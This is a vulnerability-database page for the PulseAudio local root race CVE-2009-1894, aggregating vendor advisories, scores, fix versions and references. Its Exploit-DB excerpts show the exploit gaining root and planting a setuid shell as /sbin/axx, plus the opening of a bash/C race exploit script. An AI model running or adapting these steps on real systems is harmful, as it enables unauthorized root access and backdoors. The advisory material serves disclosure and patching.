CVE-2009-1894
published 2009-07-17CVE-2009-1894: Race condition in PulseAudio 0.9.9, 0.9.10, and 0.9.14 allows local users to gain privileges via vectors involving creation of a hard link, related to the…
PriorityP432high7.2CVSS 2.0
AVLACLAuNCCICAC
EXPLOIT
EPSS
0.74%
49.8th percentile
Race condition in PulseAudio 0.9.9, 0.9.10, and 0.9.14 allows local users to gain privileges via vectors involving creation of a hard link, related to the application setting LD_BIND_NOW to 1, and then calling execv on the target of the /proc/self/exe symlink.
Affected
10 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| debian | pulseaudio | < pulseaudio 0.9.15-4.1 (bookworm) | pulseaudio 0.9.15-4.1 (bookworm) |
| linux | linux_kernel | — | — |
| linux | linux_kernel | — | — |
| pulseaudio | pulseaudio | — | — |
| pulseaudio | pulseaudio | — | — |
| pulseaudio | pulseaudio | — | — |
| pulseaudio | pulseaudio | >= 0 < 0.9.15-4.1 | 0.9.15-4.1 |
| pulseaudio | pulseaudio | >= 0 < 0.9.15-4.1 | 0.9.15-4.1 |
| pulseaudio | pulseaudio | >= 0 < 0.9.15-4.1 | 0.9.15-4.1 |
| pulseaudio | pulseaudio | >= 0 < 0.9.15-4.1 | 0.9.15-4.1 |
CVSS provenance
nvdv2.07.2HIGHAV:L/AC:L/Au:N/C:C/I:C/A:C
osv7.2HIGH
vendor_debian7.2HIGH
vendor_redhat7.2HIGH
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
Ubuntu
PulseAudio vulnerability
vendor_ubuntu·2009-07-16
CVE-2009-1894 PulseAudio vulnerability
Title: PulseAudio vulnerability
Summary: PulseAudio vulnerability
Tavis Ormandy, Julien Tinnes, and Yorick Koster discovered that PulseAudio did not
safely re-execute itself. A local attacker could exploit this to gain
root privileges.
Instructions: In general, a standard system upgrade is sufficient to effect the
necessary changes.
Red Hat
pulseaudio: privilege escalation flaw via pulseaudio re-exec
vendor_redhat·2009-07-16·CVSS 7.2
CVE-2009-1894 [HIGH] CWE-271 pulseaudio: privilege escalation flaw via pulseaudio re-exec
pulseaudio: privilege escalation flaw via pulseaudio re-exec
Race condition in PulseAudio 0.9.9, 0.9.10, and 0.9.14 allows local users to gain privileges via vectors involving creation of a hard link, related to the application setting LD_BIND_NOW to 1, and then calling execv on the target of the /proc/self/exe symlink.
Red Hat
kernel: tun/tap: Fix crashes if open() /dev/net/tun and then poll() it
vendor_redhat·2009-04-09·CVSS 7.2
CVE-2009-1897 [HIGH] kernel: tun/tap: Fix crashes if open() /dev/net/tun and then poll() it
kernel: tun/tap: Fix crashes if open() /dev/net/tun and then poll() it
The tun_chr_poll function in drivers/net/tun.c in the tun subsystem in the Linux kernel 2.6.30 and 2.6.30.1, when the -fno-delete-null-pointer-checks gcc option is omitted, allows local users to gain privileges via vectors involving a NULL pointer dereference and an mmap of /dev/net/tun, a different vulnerability than CVE-2009-1894.
Statement: The flaw only affects the Red Hat Enterprise Linux 5.4 beta kernel, which includes a backport of the upstream bug fix introducing this flaw (git commit 33dccbb0). This issue did not affect the final released Red Hat Enterprise Linux 5.4 kernel. It is also possible to mitigate this flaw by ensuring that the permissions for /dev/net/tun is restricted to root only.
This issue does
Debian
CVE-2009-1894: pulseaudio - Race condition in PulseAudio 0.9.9, 0.9.10, and 0.9.14 allows local users to gai...
vendor_debian·2009·CVSS 7.2
CVE-2009-1894 [HIGH] CVE-2009-1894: pulseaudio - Race condition in PulseAudio 0.9.9, 0.9.10, and 0.9.14 allows local users to gai...
Race condition in PulseAudio 0.9.9, 0.9.10, and 0.9.14 allows local users to gain privileges via vectors involving creation of a hard link, related to the application setting LD_BIND_NOW to 1, and then calling execv on the target of the /proc/self/exe symlink.
Scope: local
bookworm: resolved (fixed in 0.9.15-4.1)
bullseye: resolved (fixed in 0.9.15-4.1)
forky: resolved (fixed in 0.9.15-4.1)
sid: resolved (fixed in 0.9.15-4.1)
trixie: resolved (fixed in 0.9.15-4.1)
GHSA
GHSA-7g2j-wp9p-8rcr: The tun_chr_poll function in drivers/net/tun
ghsa_unreviewed·2022-05-02·CVSS 7.2
CVE-2009-1897 [HIGH] CWE-119 GHSA-7g2j-wp9p-8rcr: The tun_chr_poll function in drivers/net/tun
The tun_chr_poll function in drivers/net/tun.c in the tun subsystem in the Linux kernel 2.6.30 and 2.6.30.1, when the -fno-delete-null-pointer-checks gcc option is omitted, allows local users to gain privileges via vectors involving a NULL pointer dereference and an mmap of /dev/net/tun, a different vulnerability than CVE-2009-1894.
GHSA
GHSA-8qwr-xcgg-6rcv: Race condition in PulseAudio 0
ghsa_unreviewed·2022-05-02
CVE-2009-1894 [HIGH] CWE-362 GHSA-8qwr-xcgg-6rcv: Race condition in PulseAudio 0
Race condition in PulseAudio 0.9.9, 0.9.10, and 0.9.14 allows local users to gain privileges via vectors involving creation of a hard link, related to the application setting LD_BIND_NOW to 1, and then calling execv on the target of the /proc/self/exe symlink.
OSV
CVE-2009-1894: Race condition in PulseAudio 0
osv·2009-07-17·CVSS 7.2
CVE-2009-1894 [HIGH] CVE-2009-1894: Race condition in PulseAudio 0
Race condition in PulseAudio 0.9.9, 0.9.10, and 0.9.14 allows local users to gain privileges via vectors involving creation of a hard link, related to the application setting LD_BIND_NOW to 1, and then calling execv on the target of the /proc/self/exe symlink.
No detection rules found.
Exploit-DB
GNU C library dynamic linker - '$ORIGIN' Expansion
exploitdb·2010-10-18·CVSS 6.9
CVE-2011-0536 [MEDIUM] GNU C library dynamic linker - '$ORIGIN' Expansion
GNU C library dynamic linker - '$ORIGIN' Expansion
---
from: http://marc.info/?l=full-disclosure&m=128739684614072&w=2
The GNU C library dynamic linker expands $ORIGIN in setuid library search path
Gruezi, This is CVE-2010-3847.
The dynamic linker (or dynamic loader) is responsible for the runtime linking of
dynamically linked programs. ld.so operates in two security modes, a permissive
mode that allows a high degree of control over the load operation, and a secure
mode (libc_enable_secure) intended to prevent users from interfering with the
loading of privileged executables.
$ORIGIN is an ELF substitution sequence representing the location of the
executable being loaded in the filesystem hierarchy. The intention is to allow
executables to specify a search path for libraries that is
Exploit-DB
PulseAudio setuid (Ubuntu 9.04 / Slackware 12.2.0) - Local Privilege Escalation
exploitdb·2009-07-20
CVE-2009-1894 PulseAudio setuid (Ubuntu 9.04 / Slackware 12.2.0) - Local Privilege Escalation
PulseAudio setuid (Ubuntu 9.04 / Slackware 12.2.0) - Local Privilege Escalation
---
PulseAudio setuid Local Privilege Escalation Vulnerability
https://www.securityfocus.com/bid/35721
Credit for discovery of bug: Tavis Ormandy, Julien Tinnes and
Yorick Koster
--
Put files in /tmp/pulseaudio-exp (or change config.h). Must be on
same fs as the pulseaudio binary.
Goes faster if you already have a pulseaudio running ? :p
Tested with success on Ubuntu 9.04 (x86-64) and slackware 12.2.0
(x86)
Ubuntu:
$ ./c.sh
$ ./pulseaudio-exp
Please wait.
[*] Seems we are uid = 0 and gid = 0
[*] mv /tmp/pulseaudio-exp/shell /sbin/axx
[*] chown root.root /sbin/axx
[*] chmod 4755 /sbin/axx
Try: /sbin/axx /bin/sh
$ /sbin/axx /bin/sh
# id
uid=0(root) gid=0(root)
groups=4(adm),20(dialout),24(cdrom),46(plugdev)
Exploit-DB
PulseAudio setuid - Local Privilege Escalation
exploitdb·2009-07-20
CVE-2009-1894 PulseAudio setuid - Local Privilege Escalation
PulseAudio setuid - Local Privilege Escalation
---
#!/bin/bash
pulseaudio=`which pulseaudio`
workdir="/tmp"
#workdir=$HOME
id=`which id`
shell=`which sh`
trap cleanup INT
function cleanup()
{
rm -f $workdir/sh $workdir/sh.c $workdir/pa_race $workdir/pa_race.c
rm -rf $workdir/PATMP*
}
cat > $workdir/pa_race.c
#include
#include
#include
#include
#include
#define PULSEAUDIO_PATH "$pulseaudio"
#define SH_PATH "$workdir/sh"
#define TMPDIR_TEMPLATE "$workdir/PATMPXXXXXX"
void _pause(long sec, long usec);
int main(int argc, char *argv[], char *envp[])
{
int status;
pid_t pid;
char template[sizeof(TMPDIR_TEMPLATE)];
char *tmpdir;
char hardlink[sizeof(template) + 2];
char hardlink2[sizeof(template) + 12];
srand(time(NULL));
for( ; ; )
{
snprintf(template, sizeof(template), "%s", TMPDIR_T
Bugzilla
CVE-2009-1897 kernel: tun/tap: Fix crashes if open() /dev/net/tun and then poll() it
bugzilla·2009-07-17·CVSS 6.9
CVE-2009-1897 [MEDIUM] CVE-2009-1897 kernel: tun/tap: Fix crashes if open() /dev/net/tun and then poll() it
CVE-2009-1897 kernel: tun/tap: Fix crashes if open() /dev/net/tun and then poll() it
Reported by Eugene Kapun:
Fix NULL pointer dereference in tun_chr_pool() introduced by commit 33dccbb050bbe35b88ca8cf1228dcf3e4d4b3554 ("tun: Limit amount of queued packets per device") and triggered by this code:
int fd;
struct pollfd pfd;
fd = open("/dev/net/tun", O_RDWR);
pfd.fd = fd;
pfd.events = POLLIN | POLLOUT;
poll(&pfd, 1, 0);
Upstream commit:
http://git.kernel.org/linus/3c8a9c63d5fd738c261bd0ceece04d9c8357ca13
References:
http://lkml.org/lkml/2009/7/6/19
https://bugzilla.redhat.com/show_bug.cgi?id=495863
http://lists.grok.org.uk/pipermail/full-disclosure/2009-July/069714.html
http://git.kernel.org/linus/33dccbb050bbe35b88ca8cf1228dcf3e4d4b3554
http://article.gmane.org/gmane.linux.network/1249
Bugzilla
CVE-2009-1894 pulseaudio: privilege escalation flaw via pulseaudio re-exec
bugzilla·2009-07-07·CVSS 7.2
CVE-2009-1894 [HIGH] CVE-2009-1894 pulseaudio: privilege escalation flaw via pulseaudio re-exec
CVE-2009-1894 pulseaudio: privilege escalation flaw via pulseaudio re-exec
Tavis Ormandy and Julien Tinnes, Google Security Team, discovered a flaw in the pulseaudio, that allows local users to escalate their privileges to root, if pulseaudio is installed as setuid.
When pulseaudio is built on Linux system with compiler optimization enabled, it tries to re-exec itself with LD_BIND_NOW environment variable set to 1.
http://git.0pointer.de/?p=pulseaudio.git;a=blob;f=src/daemon/main.c;h=b58bb379#l403
This happens before root privileges are dropped. Command to execute is extracted from /proc. This way is prone to race condition and can allow local user to execute different command with root privileges.
Discussion:
Some vendors wanted an embargo date of Jul9, please do not make public com
http://blog.cr0.org/2009/07/old-school-local-root-vulnerability-in.htmlhttp://secunia.com/advisories/35868http://secunia.com/advisories/35886http://secunia.com/advisories/35896http://security.gentoo.org/glsa/glsa-200907-13.xmlhttp://taviso.decsystem.org/research.htmlhttp://www.akitasecurity.nl/advisory.php?id=AK20090602http://www.debian.org/security/2009/dsa-1838http://www.mandriva.com/security/advisories?name=MDVSA-2009:152http://www.mandriva.com/security/advisories?name=MDVSA-2009:171http://www.securityfocus.com/archive/1/505052/100/0/threadedhttp://www.securityfocus.com/bid/35721http://www.ubuntu.com/usn/usn-804-1https://admin.fedoraproject.org/updates/pulseaudio-0.9.10-1.el5.2https://bugzilla.redhat.com/show_bug.cgi?id=510071https://exchange.xforce.ibmcloud.com/vulnerabilities/51804http://blog.cr0.org/2009/07/old-school-local-root-vulnerability-in.htmlhttp://secunia.com/advisories/35868http://secunia.com/advisories/35886http://secunia.com/advisories/35896http://security.gentoo.org/glsa/glsa-200907-13.xmlhttp://taviso.decsystem.org/research.htmlhttp://www.akitasecurity.nl/advisory.php?id=AK20090602http://www.debian.org/security/2009/dsa-1838http://www.mandriva.com/security/advisories?name=MDVSA-2009:152http://www.mandriva.com/security/advisories?name=MDVSA-2009:171http://www.securityfocus.com/archive/1/505052/100/0/threadedhttp://www.securityfocus.com/bid/35721http://www.ubuntu.com/usn/usn-804-1https://admin.fedoraproject.org/updates/pulseaudio-0.9.10-1.el5.2https://bugzilla.redhat.com/show_bug.cgi?id=510071https://exchange.xforce.ibmcloud.com/vulnerabilities/51804
2009-07-17
Published